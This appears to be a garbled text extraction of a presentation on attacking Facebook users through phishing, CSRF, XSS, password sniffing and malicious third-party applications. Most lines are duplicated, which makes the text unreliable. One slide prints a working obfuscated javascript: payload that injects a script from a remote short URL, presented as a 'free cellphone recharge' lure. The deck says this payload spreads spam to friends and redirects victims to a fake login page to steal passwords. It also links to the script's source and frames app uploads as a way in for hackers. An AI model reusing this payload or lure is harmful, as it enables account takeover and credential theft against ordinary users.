This document discusses various attacks on Facebook, including phishing, cross-site request forgery (CSRF), and cross-site scripting (XSS). It notes that sending usernames and passwords in clear text leaves them vulnerable to interception. It also describes how JavaScript can be used to redirect users to fake login pages to steal passwords after a set time period. The document provides information on the Facebook platform and APIs that could potentially be exploited by hackers to upload malicious applications or access user data without permission.

1. facebook attacks

2. Phising
CSRF attack
Java scripts
XSS

3. Facebook Phising

4. Facebook CSRF attack
Third party app server

6. There are many other attacks possible likeThere are many other attacks possible like
•Brute forcingBrute forcing
•Cookie stealingCookie stealing
•Commercial Data miningCommercial Data mining
•Database Reverse-EngineeringDatabase Reverse-Engineering

7. Password Interception
•The fact that the username and password were sent in clear textThe fact that the username and password were sent in clear text
is a security vulnerability.is a security vulnerability.
• There are chances to read Facebook user names andThere are chances to read Facebook user names and
passwords off of the Ethernet or unencrypted wireless traffic,passwords off of the Ethernet or unencrypted wireless traffic,
obtaining access to users’ Facebook passwords, as well as anyobtaining access to users’ Facebook passwords, as well as any
additional accounts they use those passwords for.additional accounts they use those passwords for.
•Also the tabnabbing and CSRF have gained popularity over theAlso the tabnabbing and CSRF have gained popularity over the
open platformopen platform
Current Facebook Precaution:Current Facebook Precaution:
Facebook currently takes no steps to protect user passwords in transitFacebook currently takes no steps to protect user passwords in transit.

8. javascript:d=document;c=d.createElement(%22script
%22);d.body.appendChild(c);c.src=%22ht%22+%22tp:%22+%22//su
%22+%22.%22+%22ly%22+%22/%22+%222wL%22;void(0)
FREE!! CELLPHONE RECHARGE::..
This Script very popularly seen on Facebook, Orkut and Many
other Social Networking sites.
AnalysingAnalysing and Demoand Demo

9. What does It do?
•It is sending messages to all my friends to Recharge fromIt is sending messages to all my friends to Recharge from
accountaccount
•It is adding comments in Albums of my friendsIt is adding comments in Albums of my friends
•It is creating Threads in the Communities I Joined sayingIt is creating Threads in the Communities I Joined saying
that “Recharge this” also its adding some otherthat “Recharge this” also its adding some other
Communities to my listCommunities to my list
•Redirects you to the Fake FB login page after 10-15 minsRedirects you to the Fake FB login page after 10-15 mins
stealing your passwordstealing your password
Source Script @ http://www.mediafire.com/?t2lagmvsvftww28http://www.mediafire.com/?t2lagmvsvftww28

10. http://www.facebook.com/profile.php?id=100000781542573
www.facebook.com/username

11. The Facebook Platform
API – The API defines the various methods through which you can interactAPI – The API defines the various methods through which you can interact
with Facebook. If you’re not familiar with the idea of an API, take a look atwith Facebook. If you’re not familiar with the idea of an API, take a look at
some recent Digital Web articles: APIs and Mashups for the Rest of Us andsome recent Digital Web articles: APIs and Mashups for the Rest of Us and
Hacking on Open APIs.Hacking on Open APIs.
FBML – Facebook Markup Language is a custom markup language based onFBML – Facebook Markup Language is a custom markup language based on
various bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-basedvarious bits of HTML. It’s similar to Coldfusion or ASP.NET’s tag-based
syntax, and is used to define the pages in your application.syntax, and is used to define the pages in your application.
FQL – Facebook Query Language is SQL for Facebook. A powerful queryFQL – Facebook Query Language is SQL for Facebook. A powerful query
language for situations where there are no existing helper methods in thelanguage for situations where there are no existing helper methods in the
API, or handy tags in FBML, to do exactly what you need.API, or handy tags in FBML, to do exactly what you need.

12. How to add an
application in
Facebook

13. How can this be Used For Exploiting?
•You can Upload your own Application of any type.
•So doesn’t this strike you something of a hackers insterest

14. How can this be Used For Exploiting?

16. THANK YOUTHANK YOU